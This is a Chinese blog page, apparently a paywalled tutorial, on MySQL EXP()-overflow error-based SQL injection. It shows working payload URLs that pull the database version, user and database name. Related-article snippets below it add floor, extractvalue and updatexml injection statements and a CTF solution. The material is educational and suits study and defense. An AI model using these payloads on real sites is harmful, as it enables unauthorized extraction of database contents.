【漏洞挖掘】——109、EXP报错注入深入刨析

最新推荐文章于 2024-10-09 15:31:37 发布
最新推荐文章于 2024-10-09 15:31:37 发布
阅读量375 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: 安全 web安全 EXP报错注入 报错注入 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/139864066
EXP函数简介

函数用法:

exp(x)

函数功能:返回e的x次方

用法示例:

EXP报错注入原理

EXP报错注入是一种通过利用溢出错误来注出数据的SQL注入方式,当传递一个大于709的值给exp()函数时,函数会发生一个溢出错误,例如:

EXP报错注入流程

EXP报错注入的目标数据库版本需要在5.5及5.5以上~

获取数据库版本信息
  • http://www.example.com/?id=1' and exp(~(select * from (select version() ) a) ) --+
获取用户名相关信息
  • http://www.example.com/?id=1' and exp(~(select * from (select user() ) a) ) --+
获取数据库名的信息
  • ht
了解本专栏 订阅专栏 解锁全文
漏洞挖掘】——106、Floor报错注入
Fly_鹏程万里
06-21 142
报错注入是一种根据报错信息来构造注入语句并从错误信息中获取数据库信息的一种注入方法,常见的报错注入主要包括以下几种:rand() :可以产生一个在0和1之间的随机数,例如:rand(x):以x为随机数发生器种子值来生成固定随机数,例如:rand()*x:生成0~x之间的伪随机数,例如:FLOOR(x) 函数返回小于 x 的最大整数值,例如:类似的函数还有:通过上面的了解可以发现rand()函数可以生成一个指定范围内的伪随机数(小数),而floor可以取整,那么如果要生成一个整数呢?可以结合将Floor()与
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1230
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
exp命令报错:-bash: syntax error near unexpected token `(‘
老赵的博客
07-02 1858
在linux执行exp命令报错,如下: [oracle]$ exp system/****@orasid file=/home/oracle/dump/exp.dmp owner=(a,b,c,d) log=/home/oracle/dump/exp_a_b_c_d.log buffer=102400000 -bash: syntax error near unexpected token `(' 经查是linux系统执行命令的小括号需要转义,改成如下命令,正常执行 [oracle]$ exp syst
MYSQL 通过exp()报错注入
Ciyaso的博客
01-16 4802
代码解释 exp()数学函数,用于计算e的x次方的函数。 约束条件 5.5<mysql版本<5.6 原理 exp是以e为底的指数函数, 但是,由于数字太大是会产生溢出。这个函数会在参数大于709时溢出,报错。 将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。 我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。 从而实现了报错注入
exp报错注入
My笔记的博客
10-09 1082
23是加号的意思这里的意思是709+4,那么为什么要把+号编码呢?我们看到上面payload里的。这里我们是从大到小猜的,
mysql exp注入_Mysql注入exp报错注入
weixin_39630466的博客
01-21 519
Author:SilentDATE:2017-11-17Warning:实操部分需实现效果,不然就是失败的实验;前言:好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者就跑去测试看哪些函数会出现溢出错误。然后作者发现,当传递一个大于709...
exp报错注入和updatexml报错注入
苟有恒,必有三更眠,五更起。
07-03 641
前言 做了实验吧一个题,由于过滤比较多,学了两种新接触的报错注入。一下为总结,以便复习,查看,也作为萌新间的分享交流吧。 学习笔记 UpdateXml() MYSQL显错注入 在学习之前,需要先了解 UpdateXml() 。 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_d...
fastjson——分享
Matthew
08-06 2026
fastjson——分享 功能描述 fastjson的功能就是将json格式转换为类、字符串等供下一步代码的调用,或者将类、字符串等数据转换成json数据进行传输,有点类似序列化的操作; FastJson利用 toJSONString 方法来序列化对象,而反序列化还原回 Object 的方法,主要的API有两个,分别是 JSON.parseObject 和 JSON.parse ,最主要的区别就是前者返回的是 JSONObject 而后者返回的是实际类型的对象,当在没有对应类的定义的情况下,通常情况下都会使
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9596
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
实验吧——加了料的报错注入(exp报错注入)
weixin_30482383的博客
10-08 330
题目地址:http://ctf5.shiyanbar.com/web/baocuo/index.php 先查看页面源码得到提示知道了后台执行的sql语句,很常规的查询 测试了一个报错函数发现如下回显,可见屏蔽了报错信息,也有可能是监测到了updatexml这个报错函数,于是先用burp来fuzzing测试一波,看看哪些关键字 被屏蔽了 burp抓包并send to intru...
加了料的报错注入 - exp报错解法
苟有恒,必有三更眠,五更起。
07-03 365
加了料的报错注入 - exp报错解法 原题链接 http://ctf5.shiyanbar.com/web/baocuo/index.php 分 exp测试一下(因为#之类的注释符被过滤,注意闭合): username=&amp;password='or exp() or ' 查数据库: username=&amp;password=' or exp...
(转载)使用exp进行SQL报错注入
weixin_33890499的博客
05-19 333
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出...
使用exp进行SQL报错注入
weixin_34082695的博客
08-27 696
0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者...
sql注入分类及报错注入EXP
weixin_45626840的博客
01-20 903
sql注入分类原理,报错注入原理,EXP编写
sql注入——报错注入
m0_73756016的博客
10-18 3749
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL注入-报错注入
qwzf
09-25 3434
前言 之前没有对SQL报错注入详细总结过,总结一下。 12种SQL报错注入 1、通过floor报错,注入语句如下: and select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、通过extractvalue报错,注入语句如下: ...
mysql exp 报错_exp报错注入和updatexml报错注入
weixin_35895056的博客
02-26 582
前言做了实验吧一个题,由于过滤比较多,学了两种新接触的报错注入。一下为总结,以便复习,查看,也作为萌新间的分享交流吧。学习笔记 UpdateXml() MYSQL显错注入在学习之前,需要先了解 UpdateXml() 。UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,...
EXP-00003 ORA-01455 EXP导出报错
phantom in ORACLE
05-26 821
 最近客户那边自己自己用工具导出的时候,报错EXP-00003. 11g的一个新特性,在新建表的是,不会马上分配segment。 在exp导出时,未分配空间的表不会被导出。(此问题在oracle 11.0.2.0版本及以上已经得到修复) 1. alter system deferred_segment_creation=false ,并重启数据库才能生效。 这个参数默认的是tr
isaac sim 报错 exp——path
最新发布
12-27
### 解决 Isaac Sim `exp_path` 报错问题 当遇到与 `exp_path` 相关的错误时,通常是因为实验路径配置不正确或环境变量未设置妥当。以下是详细的排查和解决方案: #### 配置实验路径 确保 `exp_path` 路径指向有效的实验目录。该路径应该包含必要的配置文件和资源文件。如果路径不存在或权限不足,则会引发错误。 ```bash export EXP_PATH=/path/to/experiment/directory ``` 此命令需放在启动脚本之前执行,以确保环境变量生效[^1]。 #### 检查项目结构 验证项目的整体结构是否符合预期。对于基于 ROS2 的项目,常见的目录布局如下所示: - `/path/to/project/config`: 存储 YAML 或 JSON 格式的参数配置文件。 - `/path/to/project/worlds`: 包含用于仿真的世界模型描述文件。 - `/path/to/project/assets`: 放置自定义资产如网格、材质等。 确认这些子目录存在并放置了适当的内容[^2]。 #### 安装依赖项 有时缺少某些必需软件包也会导致类似的错误消息。根据具体需求安装额外的支持工具和服务: ```bash sudo apt-get update && sudo apt-get install -y \ python3-pip \ git \ wget \ curl \ cmake \ build-essential pip3 install --upgrade pip setuptools wheel ``` 上述操作有助于修复因缺失组件而引起的潜在问题[^3]。 #### 使用 PyCharm 进行调试 为了更方便地定位问题所在,在 Windows 平台上可以借助 IDE 来辅助开发工作流。通过PyCharm 设置远程解释器连接到 Linux 上运行的服务端实例,并加载完整的工程源码副本以便于断点跟踪分[^4]。 #### 特定场景适配调整 考虑到 Isaac Sim 更侧重于室内机器人应用场景的设计初衷,针对特定类型的模拟任务可能还需要做进一步优化处理。例如增加物理属性细节来提高真实性表现力;或是引入第三方插件扩展功能集以适应更多样化的测试条件[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值